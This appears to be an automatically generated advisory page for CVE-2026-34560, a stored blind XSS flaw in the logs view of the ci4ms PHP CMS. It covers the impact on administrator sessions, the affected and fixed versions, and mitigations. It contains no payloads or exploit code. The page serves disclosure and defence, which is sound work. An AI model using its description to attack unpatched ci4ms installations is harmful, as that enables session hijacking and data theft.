Platform
php
Component
ci4-cms-erp/ci4ms
Fixed in
0.31.1
0.31.0.0
CVE-2026-34560 describes a stored DOM blind Cross-Site Scripting (XSS) vulnerability within the ci4-cms-erp/ci4ms application. This vulnerability allows attackers to inject malicious scripts through the unsafe rendering of user-controlled data within the logs interface, potentially leading to administrative context execution. The vulnerability affects versions of ci4-cms-erp/ci4ms up to and including 0.28.6.0, with a fix available in version 0.31.0.0.
The impact of this XSS vulnerability is significant, particularly given the administrative context in which it can be exploited. An attacker can inject arbitrary JavaScript code that will be executed in the context of an administrator's session. This allows for a wide range of malicious actions, including session hijacking, data theft (sensitive information stored within the application), and defacement of the application. Because the XSS is 'blind,' the immediate execution isn't visible to the attacker, making detection more challenging. The attacker needs to observe the execution of the payload at a later time, typically when an administrator views the logs. This makes it similar to other blind XSS attacks where the impact is delayed and less obvious.
CVE-2026-34560 was publicly disclosed on 2026-04-01. The vulnerability's 'blind' nature may make it less immediately obvious to detect, potentially increasing the window of opportunity for exploitation. There are currently no known public proof-of-concept exploits available, but the vulnerability's severity and potential impact suggest it could become a target for attackers. The vulnerability is not currently listed on the CISA KEV catalog.
Exploit Status
EPSS
0.03% (8% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-34560 is to upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. If upgrading immediately is not possible, consider implementing temporary workarounds. Input validation and output encoding are crucial. Implement strict input validation on all data entered into the logs interface, ensuring that only expected characters are allowed. Employ robust output encoding when rendering log data to prevent malicious scripts from being executed. Consider using a Web Application Firewall (WAF) with XSS protection rules to filter out potentially malicious requests. Review and audit the application's logging mechanisms to identify and remove any instances of unsafe rendering of user-controlled data. After upgrading, confirm the fix by attempting to inject a simple XSS payload into the logs interface and verifying that it is properly sanitized.
Update CI4MS to version 0.31.0.0 or higher. This version fixes the stored XSS vulnerability in the logs interface, preventing malicious code execution when viewing the logs.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-34560 is a CRITICAL stored DOM blind XSS vulnerability in ci4-cms-erp/ci4ms, allowing attackers to inject malicious scripts via unsafely rendered log data, potentially leading to administrative context execution.
You are affected if you are using ci4-cms-erp/ci4ms versions ≤0.28.6.0. Upgrade to 0.31.0.0 to mitigate the risk.
Upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. Implement input validation and output encoding as temporary workarounds.
There are currently no confirmed reports of active exploitation, but the vulnerability's severity warrants immediate attention and mitigation.
Refer to the ci4-cms-erp project's official advisory channels for the most up-to-date information and security announcements.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.